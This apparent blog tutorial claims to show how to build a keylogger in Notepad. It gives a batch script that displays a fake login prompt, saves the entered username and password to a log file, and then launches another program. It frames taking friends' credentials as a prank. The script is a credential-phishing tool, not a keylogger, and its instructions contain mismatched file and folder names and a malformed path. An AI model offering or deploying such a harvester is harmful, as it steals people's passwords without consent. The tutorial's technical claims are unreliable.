By using this trick, you can record the keystrokes on the PC very easily without any need for third-party software. A keylogger is a type of surveillance software that has the capability to record every keystroke you make to a log file, usually encrypted. Every type of keylogger is dangerous as they can record your keystrokes, track your activity, and record the open sites. By this, your account can be easily hacked by the hackers.
These keyloggers can detect your bank account passwords, too. These types of keyloggers can also be created with the Notepad text editor. So, let’s learn how to create a keylogger using Notepad
How To Create Keylogger Using Notepad
The method is very simple and easy and you don’t need any tool to do this but just a notepad to perform the task. So just follow the post below to proceed.
1. First of all, you need to open Notepad in your Windows by pressing the Window button and then selecting Notepad from the options. Now in Notepad, copy and paste the code below it.
@echo off color a title Login cls echo Please Enter Your Email Address And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit
2. Now save this file as Logs.bat on your desktop.
3. Now create a new folder named logs. (Note that the keylogger will only work if the folder name is logged). Cut the folder and paste it into drive C
4. Now test your file Log.bat and then after entering the Username and password
5. Open the folder in C drive and see all saved key logs there as a text file created there automatically.
That’s it! you are done; you have successfully created a keylogger in Notepad.
With this method, you can easily record the keystrokes of your keyboard that had been entered in the batch file. You also use it to shock your friends by telling them their username and password. Hope you like the post, don’t forget to share and leave a comment below if you have any related queries.